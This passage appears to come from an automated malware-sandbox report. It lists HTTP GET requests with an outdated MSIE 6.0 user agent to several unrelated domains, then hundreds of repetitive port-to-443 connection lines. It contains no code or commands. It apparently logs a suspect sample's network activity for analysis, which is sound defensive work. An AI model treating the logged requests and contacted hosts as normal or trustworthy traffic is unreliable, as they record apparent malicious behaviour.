              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
              Source: unknownNetwork traffic detected: HTTP traffic on port 2062 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16820
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16821
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16817
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16818
              Source: unknownNetwork traffic detected: HTTP traffic on port 16525 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16813
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16814
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16819
              Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16830
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16831
              Source: unknownNetwork traffic detected: HTTP traffic on port 4231 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16832
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16826
              Source: unknownNetwork traffic detected: HTTP traffic on port 64628 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16827
              Source: unknownNetwork traffic detected: HTTP traffic on port 13018 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16829
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16823
              Source: unknownNetwork traffic detected: HTTP traffic on port 29834 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16824
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16825
              Source: unknownNetwork traffic detected: HTTP traffic on port 30847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 38323 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 6436 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 26327 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 31703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 9918 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 63303 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 27677 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 61592 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 48137 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 28521 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 7749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 62411 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16810
              Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16804
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16805
              Source: unknownNetwork traffic detected: HTTP traffic on port 37479 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16807
              Source: unknownNetwork traffic detected: HTTP traffic on port 26352 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16800
              Source: unknownNetwork traffic detected: HTTP traffic on port 17863 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16801
              Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16803
              Source: unknownNetwork traffic detected: HTTP traffic on port 25460 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16808
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16809
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16863
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16865
              Source: unknownNetwork traffic detected: HTTP traffic on port 60229 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16860
              Source: unknownNetwork traffic detected: HTTP traffic on port 63797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16861
              Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40613 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16859
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41817
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41818
              Source: unknownNetwork traffic detected: HTTP traffic on port 16550 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16855
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
              Source: unknownNetwork traffic detected: HTTP traffic on port 5123 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16857
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41813
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
              Source: unknownNetwork traffic detected: HTTP traffic on port 2037 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
              Source: unknownNetwork traffic detected: HTTP traffic on port 42843 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 7774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 17417 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16873
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16875
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16876
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41808
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16870
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41809
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16871
              Source: unknownNetwork traffic detected: HTTP traffic on port 62459 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16872
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41804
              Source: unknownNetwork traffic detected: HTTP traffic on port 37431 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41805
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41807
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16866
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16867
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41801
              Source: unknownNetwork traffic detected: HTTP traffic on port 57047 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16869
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41803
              Source: unknownNetwork traffic detected: HTTP traffic on port 14381 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40686 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 9943 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16840
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16841
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16842
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16843
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16837
              Source: unknownNetwork traffic detected: HTTP traffic on port 59277 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 15633 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16838
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16833
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16834
              Source: unknownNetwork traffic detected: HTTP traffic on port 1170 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16835
              Source: unknownNetwork traffic detected: HTTP traffic on port 12151 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16836
              Source: unknownNetwork traffic detected: HTTP traffic on port 25014 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 39661 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51307 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 13464 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41999 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16851
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16853
              Source: unknownNetwork traffic detected: HTTP traffic on port 4279 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16854
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16850
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16848
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16849
              Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16845
              Source: unknownNetwork traffic detected: HTTP traffic on port 14789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16846
              Source: unknownNetwork traffic detected: HTTP traffic on port 41530 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 4206 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 61146 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 48583 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 19611 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 38744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 21937 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41859
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16899
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41855
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41857
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41851
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41853
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41854
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
              Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 25435 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41849
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41845
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
              Source: unknownNetwork traffic detected: HTTP traffic on port 12126 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41847
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41841
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41843
              Source: unknownNetwork traffic detected: HTTP traffic on port 26748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 26773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 30426 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 6461 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16884
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16885
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16886
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16887
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16880
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16881
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16882
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16883
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41837
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41839
              Source: unknownNetwork traffic detected: HTTP traffic on port 50861 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16877
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41833
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16878
              Source: unknownNetwork traffic detected: HTTP traffic on port 29809 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
              Source: unknownNetwork traffic detected: HTTP traffic on port 55731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16879
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41835
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
              Source: unknownNetwork traffic detected: HTTP traffic on port 28100 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41831
              Source: unknownNetwork traffic detected: HTTP traffic on port 9522 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
              Source: unknownNetwork traffic detected: HTTP traffic on port 20624 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 62484 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 29413 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16890
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16895
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16896
              Source: unknownNetwork traffic detected: HTTP traffic on port 16971 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16897
              Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 6857 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16891
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16892
              Source: unknownNetwork traffic detected: HTTP traffic on port 28594 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16893
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16894
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41827
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41829
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16888
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16889
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41823
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41824
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41820
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41821
              Source: unknownNetwork traffic detected: HTTP traffic on port 35237 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 5544 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 15285 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 14741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 24122 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 13043 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41899
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41895
              Source: unknownNetwork traffic detected: HTTP traffic on port 55299 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41897
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41891
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41893
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
              Source: unknownNetwork traffic detected: HTTP traffic on port 18309 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
              Source: unknownNetwork traffic detected: HTTP traffic on port 61567 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 3302 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53501 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41889
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41885
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
              Source: unknownNetwork traffic detected: HTTP traffic on port 6882 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41887
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
              Source: unknownNetwork traffic detected: HTTP traffic on port 21962 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41881
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41883
              Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 4627 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 47233 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41505 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 64207 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 61171 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41877
              Source: unknownNetwork traffic detected: HTTP traffic on port 43747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41879
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41873
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41875
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
              Source: unknownNetwork traffic detected: HTTP traffic on port 16598 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41870
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41871
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41872
              Source: unknownNetwork traffic detected: HTTP traffic on port 32188 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 13439 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 14356 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
              Source: unknownNetwork traffic detected: HTTP traffic on port 23205 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41867
              Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41869
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41863
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
              Source: unknownNetwork traffic detected: HTTP traffic on port 49475 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41865
              Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41861
              Source: unknownNetwork traffic detected: HTTP traffic on port 26700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 11209 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36514 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 31296 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 45977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 64232 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56635 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 10342 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 30451 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 6040 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40265 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 30005 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
              Source: unknownNetwork traffic detected: HTTP traffic on port 19684 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
              Source: unknownNetwork traffic detected: HTTP traffic on port 44159 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41799
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41793
              Source: unknownNetwork traffic detected: HTTP traffic on port 59625 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41795
              Source: unknownNetwork traffic detected: HTTP traffic on port 29486 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
              Source: unknownNetwork traffic detected: HTTP traffic on port 2938 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41791
              Source: unknownNetwork traffic detected: HTTP traffic on port 37083 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 9101 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 44111 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 46821 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 45003 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 22866 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41789
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41785
              Source: unknownNetwork traffic detected: HTTP traffic on port 33453 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
              Source: unknownNetwork traffic detected: HTTP traffic on port 30499 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 34345 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41784
              Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36960 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 11234 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41157 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 32620 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6726
              Source: unknownNetwork traffic detected: HTTP traffic on port 43255 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 61988 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6729
              Source: unknownNetwork traffic detected: HTTP traffic on port 63376 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6721
              Source: unknownNetwork traffic detected: HTTP traffic on port 13919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6725
              Source: unknownNetwork traffic detected: HTTP traffic on port 23699 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 23710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 2879 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 2963 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 24543 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49054 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 20203 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 10895 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6716
              Source: unknownNetwork traffic detected: HTTP traffic on port 12993 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6717
              Source: unknownNetwork traffic detected: HTTP traffic on port 40290 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6719
              Source: unknownNetwork traffic detected: HTTP traffic on port 47208 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6711
